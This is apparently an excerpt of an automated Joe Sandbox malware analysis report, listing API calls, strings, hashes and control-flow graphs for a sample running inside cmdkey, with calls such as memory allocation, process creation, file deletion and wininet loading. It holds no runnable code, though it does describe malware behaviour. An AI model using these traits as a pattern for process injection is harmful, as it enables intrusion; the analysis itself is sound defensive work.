                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0115728C
                                                                Strings
                                                                • RTL: Re-Waiting, xrefs: 011572C1
                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01157294
                                                                • RTL: Resource at %p, xrefs: 011572A3
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 885266447-605551621
                                                                • Opcode ID: 9a4dcc55e6b462d43865b238f94d4aad28dd1f7194c8472959f12922367580ef
                                                                • Instruction ID: e5a82a78f0b6df71ded3b4a7bf4f223c29679e8d08e5fa7578a84f63592764e2
                                                                • Opcode Fuzzy Hash: 9a4dcc55e6b462d43865b238f94d4aad28dd1f7194c8472959f12922367580ef
                                                                • Instruction Fuzzy Hash: 17410331744212ABC728CE29CC42B6AB7B5FF94754F10462DFD65EB680DB31E8128BD5
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$]:%u
                                                                • API String ID: 48624451-3050659472
                                                                • Opcode ID: a370d51291e8b8bf0d479132aef3d422e671239b94eb7c2deaf434db33380f5a
                                                                • Instruction ID: 4a875d2562026139d69b883f7d162896232d4ee1bbed73cbe44902b85593a3e5
                                                                • Opcode Fuzzy Hash: a370d51291e8b8bf0d479132aef3d422e671239b94eb7c2deaf434db33380f5a
                                                                • Instruction Fuzzy Hash: 66316872A00219AFDF24DF2DDC41BEE77F8EB58614F444555E959D3140EB30AA548BA0
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-
                                                                • API String ID: 1302938615-2137968064
                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction ID: 6edff4a55947dd07c507ca1f02c1e297abcda4f189ef5f39e8c7d466d288e6db
                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction Fuzzy Hash: 7891D771E042369BDB2CDF6DC891ABFBBA5EF54320F14451AE965E72C0D73089608762
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $$@
                                                                • API String ID: 0-1194432280
                                                                • Opcode ID: 58cdb5e6479e536e6969b74e1e3850060bc6f05d7ee3880eb5434fc14691d63a
                                                                • Instruction ID: b05b8ee1f58ccb7a8672c7f47d30d6338c30eff4811ba7912c051eba972032e8
                                                                • Opcode Fuzzy Hash: 58cdb5e6479e536e6969b74e1e3850060bc6f05d7ee3880eb5434fc14691d63a
                                                                • Instruction Fuzzy Hash: 02811A71D012699BDB35CB54CC45BEEBBB8AF48754F0041EAEA19B7280D7709E84CFA0

                                                                Execution Graph

                                                                Execution Coverage:2.6%
                                                                Dynamic/Decrypted Code Coverage:3.6%
                                                                Signature Coverage:1.3%
                                                                Total number of Nodes:521
                                                                Total number of Limit Nodes:82
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 00A1C03F
                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 00A1C07E
                                                                • FindClose.KERNELBASE(?), ref: 00A1C089
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstNext
                                                                • String ID:
                                                                • API String ID: 3541575487-0
                                                                APIs
                                                                • NtCreateFile.NTDLL(?,?,26EBFB72,?,?,?,?,?,?,?,?), ref: 00A28AAB
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                APIs
                                                                • NtReadFile.NTDLL(?,?,26EBFB72,?,?,?,?,?,?), ref: 00A28C00
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(00A11778,?,26EBFB72,00000000,00000004,00003000,?,?,?,?,?,00A278CF,00A11778), ref: 00A28EE5
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteFile
                                                                • String ID:
                                                                • API String ID: 4033686569-0
                                                                APIs
                                                                • NtClose.NTDLL(00A210D1,?,96AB6DDB,?,?,00A210D1,?), ref: 00A28CE7
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0

                                                                Control-flow Graph

                                                                control_flow_graph 545 a10742-a1074a 546 a10716-a1071f 545->546 547 a1074c-a10761 545->547 548 a10774-a1080e call a2b840 call a13f00 call a01410 call a21530 546->548 547->548 558 a10830-a10835 548->558 559 a10810-a10821 PostThreadMessageW 548->559 559->558 560 a10823-a1082d 559->560 560->558
                                                                APIs
                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00A1081D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108

                                                                Control-flow Graph

                                                                control_flow_graph 561 a1079b-a1080e call a2ae30 call a2b840 call a13f00 call a01410 call a21530 574 a10830-a10835 561->574 575 a10810-a10821 PostThreadMessageW 561->575 575->574 576 a10823-a1082d 575->576 576->574
                                                                APIs
                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00A1081D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108

                                                                Control-flow Graph

                                                                control_flow_graph
                                                                • 577: a10712-a1080e, call a2b840, call a13f00, call a01410, call a21530; edges 577->588, 577->589
                                                                • 588: a10830-a10835
                                                                • 589: a10810-a10821, PostThreadMessageW; edges 589->588, 589->590
                                                                • 590: a10823-a1082d; edge 590->588
                                                                APIs
                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00A1081D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108
                                                                APIs
                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00A1081D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108
                                                                APIs
                                                                • Sleep.KERNELBASE(000007D0), ref: 00A2346D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: net.dll$wininet.dll
                                                                • API String ID: 3472027048-1269752229
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeUninitialize
                                                                • String ID: @J7<
                                                                • API String ID: 3442037557-2016760708
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeUninitialize
                                                                • String ID: @J7<
                                                                • API String ID: 3442037557-2016760708
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00A13F72
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                APIs
                                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,00A17CBE,00000010,?,?,?,00000044,?,00000010,00A17CBE,?,?,?), ref: 00A29120
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateInternalProcess
                                                                • String ID:
                                                                • API String ID: 2186235152-0
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00A09A92
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,B39CCE1A,00000007,00000000,00000004,00000000,00A1378B,000000F4), ref: 00A2906F
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000104,?,00A210DC,?,?,00A210DC,?,00000104,?), ref: 00A2901C
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00A17D29
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00A17D29
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00A11720,00A278CF,00A24F8F,00A116F0), ref: 00A17B20
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00A11720,00A278CF,00A24F8F,00A116F0), ref: 00A17B20
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817121146.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3330000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                • API String ID: 0-3558027158
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                Strings
                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 03544787
                                                                • Execute=1, xrefs: 03544713
                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03544725
                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03544742
                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03544655
                                                                • ExecuteOptions, xrefs: 035446A0
                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 035446FC
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                • API String ID: 0-484625025
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-$0$0
                                                                • API String ID: 1302938615-699404926
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
